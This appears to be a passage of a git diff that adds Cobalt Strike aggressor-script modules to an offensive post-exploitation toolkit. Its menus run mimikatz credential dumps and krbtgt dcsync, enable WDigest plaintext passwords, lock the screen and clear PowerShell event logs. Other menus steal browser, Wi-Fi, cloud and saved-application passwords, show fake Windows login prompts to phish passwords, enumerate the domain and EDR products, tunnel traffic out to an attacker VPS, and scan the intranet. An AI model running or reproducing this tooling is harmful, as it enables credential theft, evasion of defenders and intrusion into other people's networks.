script_resource("/scripts/Auxiliary/SharpOSS.exe"), $arg); + } +} \ No newline at end of file diff --git a/English/modules/Grab password.cna b/English/modules/Grab password.cna new file mode 100644 index 0000000..5e26313 --- /dev/null +++ b/English/modules/Grab password.cna @@ -0,0 +1,190 @@ +menu "Read password" { + item "logonpasswords" { + $bid = $1['@']; + bmimikatz($bid, "sekurlsa::logonpasswords"); + } + item "Krbtgt hash" { + $bid = $1['@']; + $dialog = dialog("Krbtgt NTLM-Hash" , %(domain => "xxx.com" , user => "krbtgt", bid => $bid), &krbtgt); + dialog_description($dialog, "Use Mimikatz to read the NTLM-Hash of the Krbtgt account."); + drow_text($dialog, "domain", "Domain: "); + drow_text($dialog, "user", "User: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub krbtgt{ + $domain = $3['domain']; + $user = $3['user']; + bmimikatz($bid, "lsadump::dcsync /domain:$domain /user:$user"); + } + + menu "Detect wifi password" { + item "Get connected wifi" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "netsh wlan show profiles"); + } + } + item "Get wifi password" { + prompt_text("Enter wifi name: ", "", lambda({ + bshell(@ids, "netsh wlan show profile name=\"$1\" key=clear"); + }, @ids => $1)); + } + item "SharpWifiGrabber (retrieve Wi-Fi password)" + { + blog($1, "Project address: https://github.com/r3nhat/SharpWifiGrabber") + bexecute_assembly($1, script_resource('/scripts/Grab password/SharpWifiGrabber.exe'), ""); + } + } + + menu "Modify registry dump plain text password" { + item "Show plain text" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f"); + } + } + item "Force lock screen" { + local('$bid'); + foreach $bid ($1){ + blog($1, "Lock screen is being executed"); + bpowershell_import($bid, script_resource("/scripts/Grab password/lock-screen.ps1")); + bpowerpick($bid,"Lock-WorkStation"); + bshell($bid,"wevtutil cl \"Windows PowerShell\""); + } + } + item "Hide plain text" { + local('$bid'); + foreach $bid ($1){ + bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f"); + } + } +} + +menu "Extract browser data and passwords" { + item "BrowserGhost (extract browser passwords)" { + blog($1, "Project address: https://github.com/QAX-A-Team/BrowserGhost") + bexecute_assembly($1, script_resource("/scripts/Grab password/BrowserGhost.exe")); + } + + item "SharpChromium (extract browser data)" { + $bid = $1['@']; + $dialog = dialog("SharpChromium", %(bid => $bid), &SharpChromium); + dialog_description($dialog,".NET 4.0 CLR project for retrieving Chromium data such as cookies, history, and saved logins. Project address: https://github.com/djhohnstein/SharpChromium"); drow_combobox($dialog, "Type", "all/cookies/history/logins", @("all", "cookies","history","logins")); dbutton_action($dialog, "Run"); dialog_show($dialog); } sub SharpChromium { bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpChromium.exe"), $3['Type']); } } menu "hack-browser-data" { item "Upload hack-browser-data" { $bid = $1; $dialog = dialog("Upload hack-browser-data", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &hack-browser-data); dialog_description($dialog, "All platforms supported, software address: https://github.com/moonD4rk/HackBrowserData"); + drow_text($dialog, "UploadPath", "Upload path: "); + dbutton_action($dialog, "Upload"); + dialog_show($dialog); + } + sub hack-browser-data { + bcd($bid, $3['UploadPath']); + bupload($bid, script_resource("/scripts/Grab password/hack-browser-data.exe")); + } + + item "Run hack-browser-data"{ + $bid = $1['@']; + $Dialog = dialog("Run hack-browser-data",%(bid => $bid),&hack-browser-data_run); + dialog_description($Dialog, "After running, a results folder will be generated in the current directory, and all results are in it"); + dbutton_action($Dialog, "Run"); + btask($bid, "After running, a results folder will be generated in the current directory, and all the results are in it", ""); + dialog_show($Dialog); + } + sub hack-browser-data_run{ + bshell($bid, "hack-browser-data.exe"); + } + + item "Delete hack-browser-data"{ + local('$bid'); + foreach $bid ($1){ + bshell($1, "del /f /s /q hack-browser-data.exe"); + } + } +} + +menu "Local program file password decryption" { + item "SharpCloud (Get cloud credentials)" { + $bid = $1['@']; + $dialog = dialog("Get cloud credentials", %(bid => $bid), &SharpCloud); + dialog_description($dialog, "Used to check whether there are credential files related to AWS, Microsoft Azure and Google Compute. Project address: https://github.com/chrismaddalena/SharpCloud"); drow_combobox($dialog, "type", "type:", @("all","aws","azure","gcloud")); dbutton_action($dialog, "Run"); dialog_show($dialog); } sub SharpCloud { $arg = join(' ', @($3['type'])); bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpCloud.exe"), $arg); } menu "SharpDecryptPwd(from uknowsec)" { item "SharpDecryptPwd" { $bid = $1['@']; $dialog = dialog("SharpDecryptPwd", %(type => "-NavicatCrypto",bid => $bid), &SharpDecryptPwd); dialog_description($dialog,"Parse some programs whose passwords have been saved on the Windwos system, including: Navicat, TeamViewer, FileZilla, WinSCP, Xmangager series products (Xshell, Xftp). Project address: https://github.com/uknowsec/SharpDecryptPwd"); + drow_combobox($dialog, "type", "Type:", @("-NavicatCrypto", "-TeamViewer", "-FileZilla","-WinSCP")); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + item "Xmanager" { + $bid = $1['@']; + $dialog = dialog("Xmangager", %(type => "-Xmangager",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &Xmangager); + dialog_description($dialog, "Xmanager series products, such as:Xshell,Xftp。"); + drow_combobox($dialog, "type", "Type:", @("-Xmangager")); + drow_text($dialog, "path", "Sessions Path: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } +} + sub SharpDecryptPwd { + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd.exe"), $3['type']); + } + sub Xmangager { + $arg = join(' ', @($3['type'],"-p",$3['path'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd.exe"), $arg); + } + + menu "SharpDecryptPwd(from RcoIl)" { + item "SharpDecryptPwd40" { + $bid = $1['@']; + $dialog = dialog("SharpDecryptPwd40", %(type => "-Navicat",bid => $bid), &SharpDecryptPwd40); + dialog_description($dialog,"Currently supports Navicat series, Xmanager series, TeamViewer, FileZilla client, Foxmail, RealVNC server, TortoiseSVN, WinSCP, Chrome full version. Project address: https://github.com/RcoIl/SharpDecryptPwd"); + drow_combobox($dialog, "type", "Type:", @("-Navicat", "-TeamViewer", "-FileZilla","-WinSCP","-Foxmail","-RealVNC","-TortoiseSVN","-Chrome")); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + item "Xmangager40" { + $bid = $1['@']; + $dialog = dialog("Xmangager", %(type => "-Xmanager",path => "D:\\xshell\\Xshell\\Sessions",bid => $bid), &Xmangager40); + dialog_description($dialog, "Xmangager series products, such as:Xshell,Xftp"); + drow_combobox($dialog, "type", "Type:", @("-Xmanager")); + drow_text($dialog, "path", "Sessions Path: "); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + } + sub SharpDecryptPwd40 { + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd40.exe"), $3['type']); + } + sub Xmangager40 { + $arg = join(' ', @($3['type'],"-p",$3['path'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/SharpDecryptPwd40.exe"), $arg); + } +} + + item "Net-GPPPassword (Group Policy Account Credentials)" { + blog($1, ".NET implementation of Get-GPPPassword. Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferences. This technique is old, but still useful in environments where domains were created a long time ago. Project address: https://github.com/outflanknl/Net-GPPPassword") + bexecute_assembly($1, script_resource("/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe"), ""); + } + + menu "Phishing password stealing" { + item "FakeLogonScreen (windows lock screen phishing)" { + $bid = $1; + $dialog = dialog("FakeLogonScreen", %(bid => $bid), &FakeLogonScreen); + dialog_description($dialog, "FakeLogonScreen is a utility for faking the Windows login screen to obtain the user's password. The entered password is verified against Active Directory or the local computer to ensure that the password is correct, and the output is written to the console and the %LOCALAPPDATA%\\Microsoft\\user.db file. Because the fake page is hard to describe, use it with caution!!! Project address: https://github.com/bitsadmin/fakelogonscreen"); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub FakeLogonScreen { + bexecute_assembly($bid, script_resource("/scripts/Grab password/FakeLogonScreenToFile.exe"), ""); + } + + item "CredPhisher (Authentication Login Box Phishing)" { + $bid = $1['@']; + $dialog = dialog("CredPhisher", %(content => "Security Authentication", bid => $bid), &CredPhisher); + dialog_description($dialog, "Pop up the security authentication login box for phishing. Windows 10 test successful. Project address: https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher"); + drow_text($dialog, "content", "content:"); + dbutton_action($dialog, "Run"); + dialog_show($dialog); + } + sub CredPhisher { + $arg = join('',@("",$3['content'])); + bexecute_assembly($bid, script_resource("/scripts/Grab password/CredPhisher.exe"), $arg); + } + } + + +} \ No newline at end of file diff --git a/English/modules/Information collection.cna b/English/modules/Information collection.cna new file mode 100644 index 0000000..71822b2 --- /dev/null +++ b/English/modules/Information collection.cna @@ -0,0 +1,329 @@ +menu "Information collection" { +menu "Common stand-alone commands" { +item "systeminfo" { +$bid = $1['@']; +bshell($bid, "systeminfo"); +} +item "whoami /all" { +$bid = $1['@']; +bshell($bid, "whoami /all"); +} +item "ipconfig /all" { +$bid = $1['@']; +bshell($bid, "ipconfig /all"); +} +item "View routing table" { +$bid = $1['@']; +bshell($bid, "route print"); +} +item "View arp cache" { +$bid = $1['@']; +bshell($bid, "arp -A"); +} +item "View user information" { +$bid = $1['@']; +bshell($bid, "net user"); +} +item "View installation program and version information" { +$bid = $1['@']; +bshell($bid, "wmic product get name,version"); +} +item "View installed patches" { +$bid = $1['@']; +bshell($bid, "wmic qfe get Caption,Description,HotFixID,InstalledOn"); +} +item "View running processes and paths" { +$bid = $1['@']; +bshell($bid, "wmic process get caption,executablepath,commandline"); +} +item "View process details" { +$bid = $1['@']; +bshell($bid, "wmic process get caption,commandline,processid /value"); +} +item "View services" { +$bid = $1['@']; +bshell($bid, "wmic service list brief"); +} +item "View firewall configuration" { +$bid = $1['@']; +bshell($bid, "netsh firewall show config"); +} +item "View scheduled tasks" { +$bid = $1['@']; +bshell($bid, "schtasks.exe"); +} +item "View scheduled task details" { +$bid = $1['@']; +bshell($bid, "schtasks /query /fo LIST /v"); +} +item "View startup program information" { +$bid = $1['@']; +bshell($bid, "wmic startup get command,caption"); +} +item "View online users" { +$bid = $1['@']; +bshell($bid, "query user || qwinsta"); +} +item "View boot time" { +$bid = $1['@']; +bshell($bid, "net statistics workstation"); +} +item "View PowerShell v5 historical commands" { +$bid = $1['@']; +bshell($bid, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"); +} +item "View recently used items" { +$bid = $1['@']; +bshell($bid, "dir %APPDATA%\\Microsoft\\Windows\\Recent"); +} +item "View SMB pointing path" { +$bid = $1['@']; +bshell($bid, "wmic share get name,path"); +} +} + +menu "Common commands in domain environment" { +menu "AdFind (query domain information)" { +item "Upload AdFind" { +$bid = $1; +$dialog = dialog("Upload AdFind", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &AdFind_upload); +dialog_description($dialog,"AdFind is used to query information within the domain. Project address: http://www.joeware.net/freetools/tools/adfind/index.htm"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub AdFind_upload { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Information collection/AdFind.exe")); +} +item "List domain controller names" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc dclist"); +} +item "Query online computers in the current domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc computers_active"); +} +item "Query online computers in the current domain (only display name and operating system)" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc computers_active name operatingSystem"); +} +item "Query all computers in the current domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -f \"objectcategory=computer\""); +} +item "Query all computers in the current domain (only display name and operating system)" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -f \"objectcategory=computer\" name operatingSystem"); +} +item "Query all users in the domain" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -users name"); +} +item "Query all GPOs" { +$bid = $1['@']; +bshell($bid, "AdFind.exe -sc gpodmp"); +} +item "Delete AdFind" { +$bid = $1['@']; +bshell($bid, "del /f /s /q AdFind.exe"); +} +} + +item "Query domain" { +$bid = $1['@']; +bshell($bid, "net view /domain"); +} +item "View domain management" { +$bid = $1['@']; +bshell($bid, "net group \"domain admins\" /domain"); +} +item "View domain user details" { +prompt_text("Enter domain user name", "", lambda({bshell(@bid, "net user $1 /domain");}, @bid => $bid)); +} +item "View current login domain" { +$bid = $1['@']; +bshell($bid, "net config workstation"); +} +item "View time server" { +$bid = $1['@']; +bshell($bid, "net time /domain"); +} +item "Display the computer list of the current domain" { +$bid = $1['@']; +bshell($bid, "net view"); +} +item "View the domain administrator logged in to this machine" { +$bid = $1['@']; +bshell($bid, "net localgroup administrators /domain"); +} +item "View all domain users" { +$bid = $1['@']; +bshell($bid, "net user /domain"); +} +item "View the list of all user groups in the domain" { +$bid = $1['@']; +bshell($bid, "net group /domain"); +} +item "View the primary domain controller" { +$bid = $1['@']; +bshell($bid, "netdom query pdc"); +} +item "View the domain controller list" { +$bid = $1['@']; +bshell($bid, "net group \"Domain Controllers\" /domain"); +} +item "View domain controller host name" { +$bid = $1['@']; +bshell($bid, "Nslookup -type=SRV _ldap._tcp"); +} +item "Get domain trust information" { +$bid = $1['@']; +bshell($bid, "nltest /domain_trusts"); +} +item "Get domain password information" { +$bid = $1['@']; +bshell($bid, "net accounts /domain"); +} +item "View a list of all domain member computers" { +$bid = $1['@']; +bshell($bid, "net group \"domain computers\" /domain"); +} +item "View all computers in the domain" { +prompt_text("Enter host name", "", lambda({bshell(@bid, "net view /domain:$1");}, @bid => $bid)); } } + + item "SharpChassisType (determine the host type)" { +$bid = $1['@']; +$dialog = dialog("SharpNetCheck", %(bid => $bid), &SharpChassisType); +dialog_description($dialog,"Used to determine the current machine type (desktop computer, laptop, etc.). Project address: https://github.com/RcoIl/CSharp-Tools/"); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpChassisType{ +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpChassisType.exe"), ""); +} + +item "SharpEventLog (get system login log)" { +$bid = $1; +$dialog = dialog("SharpEventLog", %(EventLogType => "-4624",bid => $bid), &SharpEventLog); +dialog_description($dialog, "Read all computer information of failed or successful logins (4624, 4625) that have logged into the local machine, and quickly locate the operation and maintenance management personnel during intranet penetration. Project address: https://github.com/uknowsec/SharpEventLog"); +drow_combobox($dialog, "EventLogType", "EventLog Type:", @("-4624", "-4625")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpEventLog { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpEventLog.exe"), $3['EventLogType']); +} + +item "SharpCheckInfo(Get multiple host information)" { +$bid = $1; +$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpCheckInfo); +dialog_description($dialog, "Collect target host information, including recently opened files, system environment variables, and Recycle Bin files, etc. Project address: https://github.com/uknowsec/SharpCheckInfo"); +drow_combobox($dialog, "Type", "Type:", @("-All", "-EnvironmentalVariables","-GetRecycle","-AllUserDirectories","-PowershellInfo","-CsharpVersion","-AvProcessEDRproduct","-Defender","-RecentFiles","-NetworkConnentions","-ApplockerEnumerating","-Drives","-LAPS")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpCheckInfo { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpCheckInfo.exe"), $3['Type']); +} + + item "SharpSQLDump (Quickly List Database Data)" { +$bid = $1['@']; +$dialog = dialog("SharpSQLDump", %(host => "",username => "",password => "",type => "mysql",bid => $bid), &SharpSQLDump); +dialog_description($dialog, "Quickly obtain all database names, table names, and column names in the intranet penetration. After specific judgment, go to the data to save time. Applicable to mysql, mssql. Project address: https://github.com/uknowsec/SharpSQLDump"); +drow_text($dialog, "host", "host: "); +drow_text($dialog, "username", "username: "); +drow_text($dialog, "password", "password: "); +drow_combobox($dialog, "type", "-mysql/-mssql", @("-mysql", "-mssql")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpSQLDump { +$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type'])); +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpSQLDump.exe"), $arg); +} + +item "SharpClipHistory(Get win10 clipboard)" { +$bid = $1; +$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpClipHistory); +dialog_description($dialog, "Can be used to read the contents of the user's clipboard history in Windows 10 starting from the 1809 Build version. A blank type option means reading. Project address: https://github.com/FSecureLABS/SharpClipHistory"); +drow_combobox($dialog, "Type", "Type:", @("--help","","--checkOnly","--enableHistory","--saveImages","--keepassBypass")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpClipHistory { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpClipHistory.exe"), $3['Type']); +} + +item "SharpAVKB(Antivirus and Patch Comparison)" { +$bid = $1; +$dialog = dialog("SharpAVKB", %(type => "-AV",bid => $bid), &SharpAVKB); +dialog_description($dialog, "Windows antivirus comparison and patch number comparison. Project address: https://github.com/uknowsec/SharpAVKB"); +drow_combobox($dialog, "type", "type:", @("-AV", "-KB")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpAVKB { +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpAVKB.exe"), $3['type']); +} + +item "SharpEDRChecker (Get EDR Information)" { +$bid = $1['@']; +btask($bid, "Check running processes, process metadata, Dlls loaded into the current process and each DLL metadata, common installation directories, installed services and each service binary metadata, installed drivers and each driver metadata, all of which exist for known defensive products such as AV, EDR, and logging tools. It is also possible to capture hidden EDRs through its metadata check. Project address: https://github.com/PwnDexter/SharpEDRChecker", ""); +bexecute_assembly($1, script_resource("/scripts/Information collection/SharpEDRChecker.exe"), ""); +} + + item "SharpDir (file search)" { +$bid = $1['@']; +$dialog = dialog("File search", %(path => "C:\\",file => "payload.exe||passwords*||*.txt",bid => $bid), &SharpDir); +dialog_description($dialog, "File search, three search methods, specify file name, set file name search suffix, search for specified suffix file. Project address: https://github.com/jnqpblc/SharpDir"); +drow_text($dialog, "path", "path: "); +drow_text($dialog, "file", "file: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpDir { +$arg = join(' ', @($3['path'],$3['file'])); +bexecute_assembly($bid, script_resource("/scripts/Information collection/SharpDir.exe"), $arg); +} + +menu "Everything (Create http service file search)" { +item "Upload Everything" { +$bid = $1; +$dialog = dialog("Upload Everything", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &evething); +dialog_description($dialog, "Run without any pop-up window, software address: https://www.voidtools.com/zh-cn/"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub evething { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Information collection/everything/Everything.exe")); +bupload($bid, script_resource("/scripts/Information collection/everything/Everything.ini")); +} + +item "Run Everything"{ +$bid = $1['@']; +$Dialog = dialog("Run Evething",%(bid => $bid),&Evething_run); +dialog_description($Dialog, "Run without any pop-up window or tray display, automatically enable http service. Port: 65535, User: admin, Password: admin@123"); +btask($bid, "Run without any pop-up window or tray display, automatically enable http service. Access web service: http://ip:65535, User: admin, Password: admin@123", ""); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub Evething_run{ +bshell($bid, "Everything.exe"); +} +item "Stop Everything"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im Everything.exe"); +} +} +item "Delete Everything"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im Everything.exe & del /f /s /q Everything.exe & del /f /s /q Everything.ini"); } } } + + + +} diff --git a/English/modules/Intranet agent.cna b/English/modules/Intranet agent.cna new file mode 100644 index 0000000..2c2f131 --- /dev/null +++ b/English/modules/Intranet agent.cna @@ -0,0 +1,185 @@ +menu "Intranet penetration" { +menu "frpModify" { +item "Upload frpc" { +$bid = $1; +$dialog = dialog("Upload frpc", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &frp_upload); +dialog_description($dialog,"frp specified parameter version (no need to implement frpc.ini). Project address: https://github.com/uknowsec/frpModify"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub frp_upload { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/frpcx.exe")); +} +item "Run frpc"{ +$bid = $1['@']; +$Dialog = dialog("Run frpc",%(ip => "x.x.x.x", port => "2333",bid => $bid),&frpc_run); +dialog_description($Dialog, "Run frpc, use frpModify, specify parameters, token is: uknowsec, socks5 port is 23333."); +drow_text($Dialog, "ip", "ip: "); +drow_text($Dialog, "port", "port: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub frpc_run{ +local('$Name $port'); +$Name = $3['ip']; +$port = replace($3['port'], "\"", ""); +bshell($bid, "frpcx.exe -t $+ $Name -p $+ $port"); +} +item "Stop frpc"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im frpcx.exe"); +} +} +item "Delete frpc"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im frpcx.exe & del /f /s /q frpcx.exe"); +} +} +} +menu "nps" { +item "Upload npc" { +$bid = $1; +$dialog = dialog("Upload npc", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &npc_upload); +dialog_description($dialog,"A lightweight, high-performance, powerful intranet penetration proxy server. Supports almost all traffic forwarding such as tcp, udp, socks5, http, etc. Reference: https://mp.weixin.qq.com/s/zI04_kxVFWdnegctAzNmmg. Project address: https://github.com/ehang-io/nps"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub npc_upload { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/npc.exe")); +} +item "Run npc"{ +$bid = $1['@']; +$Dialog = dialog("Run npc",%(server => "ip:8024", vkey => "",bid => $bid),&npc_run); +dialog_description($Dialog, "Run NPC, no configuration file, use reference: https://mp.weixin.qq.com/s/zI04_kxVFWdnegctAzNmmg."); +drow_text($Dialog, "server", "server: "); +drow_text($Dialog, "vkey", "vkey: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub npc_run{ +local('$server $vkey'); +$server = $3['server']; +$vkey = replace($3['vkey'], "\"", ""); +bshell($bid, "npc.exe -server= $+ $server -vkey= $+ $vkey"); +} +item "Stop NPC"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im npc.exe"); +} +} +item "Delete npc"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im npc.exe & del /f /s /q npc.exe"); +} +} +} + +menu "NATBypass (port forwarding)" { +item "Upload nb" { +$bid = $1; +$dialog = dialog("Upload nb", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &nb); +dialog_description($dialog,"An implementation of lcx in golang. Project address: https://github.com/cw1997/NATBypass"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub nb { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/nb.exe")); +} + item "Run nb"{ +$bid = $1['@']; +$Dialog = dialog("Run nb",%(lhost => "127.0.0.1:3389", rhost => "x.x.x.x:1997",bid => $bid),&nb_run); +dialog_description($Dialog, "vps run: ./nb -listen 1997 2017"); +drow_text($Dialog, "lhost", "Local IP:Port"); +drow_text($Dialog, "rhost", "Public IP:Port"); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub nb_run{ +local('$lhost $rhost'); +$lhost = $3['lhost']; +$rhost = replace($3['rhost'], "\"", ""); +bshell($bid, "nb.exe -slave $+ $lhost $+ $rhost"); +} +item "Stop nb"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im nb.exe"); +} +} +item "Delete nb"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im nb.exe & del /f /s /q nb.exe"); +} +} +} + +menu "iox (port forwarding and socks5)" { +item "Upload iox" { +$bid = $1; +$dialog = dialog("Upload iox", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &iox); +dialog_description($dialog,"Port forwarding tool and socks5 proxy. Project address: https://github.com/EddieIvan01/iox"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub iox { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet agent/iox.exe")); +} +item "Run iox(fwd)"{ +$bid = $1['@']; +$Dialog = dialog("Run iox",%(lhost => "192.168.0.100:3389", rhost => "*x.x.x.x:3389", hex => "656565",bid => $bid),&iox_fwdrun); +dialog_description($Dialog, "vps run: ./iox fwd -l *3389 -l 33890 -k 656565"); +drow_text($Dialog, "lhost", "local IP:Port"); +drow_text($Dialog, "rhost", "public IP:Port"); +drow_text($Dialog, "hex", "traffic encryption key: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} + sub iox_fwdrun{ +local('$lhost $rhost $hex'); +$lhost = $3['lhost']; +$rhost = replace($3['rhost'], "\"", ""); +$hex = $3['hex']; +bshell($bid, "iox.exe fwd -r $+ $lhost -r $+ $rhost -k $+ $hex"); +} + +item "Run iox(proxy)"{ +$bid = $1['@']; +$Dialog = dialog("Run iox",%(rhost => "*x.x.x.x:9999", hex => "000102",bid => $bid),&iox_proxyrun); +dialog_description($Dialog, "vps first establishes a service: ./iox proxy -l *9999 -l 1080 -k 000102"); +drow_text($Dialog, "rhost", "Public IP:Port"); +drow_text($Dialog, "hex", "Traffic encryption key: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub iox_proxyrun{ +local('$rhost $hex'); +$rhost = $3['rhost']; +$hex = replace($3['hex'], "\"", ""); +bshell($bid, "iox.exe proxy -r $+ $rhost -k $+ $hex"); +} + +item "Stop iox"{ +local('$bid'); +foreach $bid ($1){ +bshell($1, "taskkill -f /im iox.exe"); +} +} +item "Delete iox"{ +local('$bid'); +foreach $bid ($1){ bshell($1, "taskkill -f /im iox.exe & del /f /s /q iox.exe"); } } + } + +} diff --git a/English/modules/Intranet scanning.cna b/English/modules/Intranet scanning.cna new file mode 100644 index 0000000..383d92c --- /dev/null +++ b/English/modules/Intranet scanning.cna @@ -0,0 +1,110 @@ +menu "Intranet Scan" { +menu "fscan" { +item "Upload fscan" { +$bid = $1; +$dialog = dialog("Upload fscan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &fscan); +dialog_description($dialog, "Supports host survival detection, port scanning, common service blasting, ms17010, redis batch writing private keys, scheduled task rebound shell, read win network card information, etc. Project address: https://github.com/shadow1ng/fscan"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub fscan { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet scanning/fscan.exe")); +} +item "Run fscan"{ +$bid = $1['@']; +$dialog = dialog("Run fscan",%(exec => "fscan.exe -h 192.168.1.1/24 -o ok.txt", bid => $bid),&fscan_run); +dialog_description($dialog, "Pay attention to the instructions for use of the console output, and enter the execution command directly below:"); +drow_text($dialog, "exec", "Exec: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub fscan_run{ +$exec = $3['exec']; +bshell($bid, "$exec"); +} +item "Delete fscan"{ +$bid = $1['@']; +bshell($bid, "taskkill -f /im fscan.exe & del /f /s /q fscan.exe"); +} +} + item "SharpWebScan (detect web service)" { +$bid = $1['@']; +$dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,443,7001,8000,8001,8080,8888",bid => $bid), &SharpWebScan); +dialog_description($dialog, "Scan IP or C segment web service, get Title, customizable multi-port scanning, return web address and title. Project address: https://github.com/RcoIl/CSharp-Tools/tree/master/SharpWebScan"); +drow_text($dialog, "ip", "ip: "); +drow_text($dialog, "port", "ports: "); +drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP")); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpWebScan { +$arg = join(' ', @($3['iptype'],$3['ip'],$3['port'])); +bexecute_assembly($bid, script_resource("/scripts/Intranet scanning/SharpWebScan.exe"), $arg); +} + +menu "TailorScan (Seamless Intranet Scanner)" { +item "Upload TailorScan" { +$bid = $1; +$dialog = dialog("Upload TailorScan", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &TailorScan); +dialog_description($dialog, "Support port scanning, identify services, get title, scan multiple network cards, ms17010 scan, icmp survival detection. Project address: https://github.com/uknowsec/TailorScan"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub TailorScan { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Intranet scanning/TailorScan.exe")); +} +item "Run TailorScan"{ +$bid = $1['@']; +btask($bid, " ", ""); +btask($bid, "TailorScan.exe", ""); +btask($bid, " ", ""); +btask($bid, "Scan IP format support:", ""); +btask($bid, " 192.168.1.1", ""); +btask($bid, " 192.168.1.1-10", ""); +btask($bid, " 192.168.1.*", ""); +btask($bid, " 192.168.1.0/24", ""); +btask($bid, " ", ""); +btask($bid, "Port supports custom list, separated by ',', such as:", ""); +btask($bid, " 21,22,80-99,8000-8080", ""); 